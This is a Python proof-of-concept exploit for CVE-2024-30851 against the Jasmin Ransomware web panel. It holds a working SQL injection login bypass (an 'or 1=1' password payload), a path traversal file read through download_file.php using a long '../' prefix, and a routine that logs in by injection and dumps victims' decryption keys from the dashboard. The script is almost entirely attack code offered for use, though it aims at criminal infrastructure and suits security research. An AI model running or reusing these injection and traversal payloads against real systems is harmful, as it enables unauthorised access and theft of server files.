# Exploit Title: Jasmin Ransomware arbitrary file read
# Date: 2024-04-04
# Exploit Author: @_chebuya
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: v1.1
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2024-30851
# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login
# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/main

import requests
import argparse
import os

from bs4 import BeautifulSoup


def get_file(jasmin_url, filepath):
    """Return the body of the panel's download_file.php response for *filepath*.

    *filepath* is interpolated as given into the ``file`` query parameter and
    redirects are not followed. The HTTP status code is never inspected, so
    an error page or an empty redirect body comes back exactly as file content
    would. No timeout is passed to ``requests``.
    """
    download_url = f'{jasmin_url}/download_file.php?file={filepath}'
    reply = requests.get(download_url, allow_redirects=False)
    return reply.text


def get_keys(jasmin_url):
    """Print the file linked from each dashboard row, labelled as a decryption key.

    The function posts a fixed form body to checklogin.php, reuses whatever
    cookies that response sets to request dashboard.php, and walks every
    ``<tr>`` of the returned HTML. Nothing is returned; output goes to stdout.

    Neither response is checked for success. A row with fewer than eight
    ``<td>`` cells, or without an ``<a>`` in the eighth, raises instead of
    being skipped.
    """
    form_headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    }
    # Sent as a raw string, so requests transmits it unchanged as the form body.
    login_body = "username=&password='+or+1%3D1+--+-&service=login"

    login_req = requests.post(
        f'{jasmin_url}/checklogin.php',
        headers=form_headers,
        data=login_body,
    )
    session_cookies = login_req.cookies

    list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=session_cookies)
    rows = BeautifulSoup(list_req.text, 'html.parser').find_all('tr')

    # One row is subtracted from the count; presumably the table header,
    # which is also what the empty-cell check below skips.
    victim_count = len(rows) - 1
    print(f"Dumping decryption keys from {victim_count} victims")

    for row in rows:
        cells = row.find_all('td')
        if not cells:
            continue

        username = cells[1].get_text()
        hostname = cells[0].get_text()
        # The link's href is split on "=" and the second piece is used as the
        # path, so anything after a further "=" in the href is dropped.
        link = cells[7].find('a')
        filepath = link['href'].split("=")[1]

        key_text = get_file(jasmin_url, filepath)
        print(f"Decryption key for {username}@{hostname}: {key_text}")


# Command-line interface: two subcommands, each taking the panel URL.
parser = argparse.ArgumentParser(
    description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel"
)
subparser = parser.add_subparsers(dest='subcommand')

file_parser = subparser.add_parser("getfile", help="Read a file off the server")
file_parser.add_argument(
    "-u", "--url",
    required=True,
    help="The jasmin ransomware web panel url (http://target_server)",
)
# Default is the access log, deanonymize the operators!
file_parser.add_argument(
    "-f", "--file",
    default="c:/xampp/apache/logs/access.log",
    help="The file to read on the target server",
)

keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")
keys_parser.add_argument(
    "-u", "--url",
    required=True,
    help="The jasmin ransomware web panel url (http://target_server)",
)

args = parser.parse_args()

if args.subcommand is None:
    # No subcommand given: show usage instead of contacting anything.
    parser.print_help()
else:
    target_url = args.url.rstrip("/")

    if args.subcommand == "getfile":
        # Normalise backslashes to forward slashes and drop a literal "c:"
        # before combining the path with the relative prefix via os.path.join.
        forward_slashed = args.file.replace("\\", "/")
        target_file = forward_slashed.replace("c:", "")
        target_path = os.path.join("../../../../../../../../../", target_file)
        print(get_file(target_url, target_path))
    elif args.subcommand == "getkeys":
        get_keys(target_url)